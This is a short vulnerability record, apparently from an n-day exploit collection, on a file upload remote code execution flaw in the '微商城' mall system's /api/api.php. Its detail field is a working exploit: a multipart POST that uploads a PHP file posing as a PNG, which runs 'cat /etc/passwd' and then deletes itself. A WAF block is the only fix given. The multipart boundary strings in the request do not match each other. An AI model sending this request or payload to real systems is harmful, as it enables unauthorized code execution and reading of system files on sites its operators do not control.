vendor = "微商城"
name = "微商城系统api.php存在文件上传漏洞"
type = "RCE"
version = "未知"
path = "/api/api.php"
detail = "POST /api/api.php?mod=upload&type=1 HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTqkdY1lCvbvpmown ------WebKitFormBoundaryaKljzbg49Mq4ggLz Content-Disposition: form-data; name=\"file\"; filename=\"rce.php\" Content-Type: image/png <?php system(\"cat /etc/passwd\");unlink(__FILE__);?> ------WebKitFormBoundaryaKljzbg49Mq4ggLz--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0823"
label = "nday"
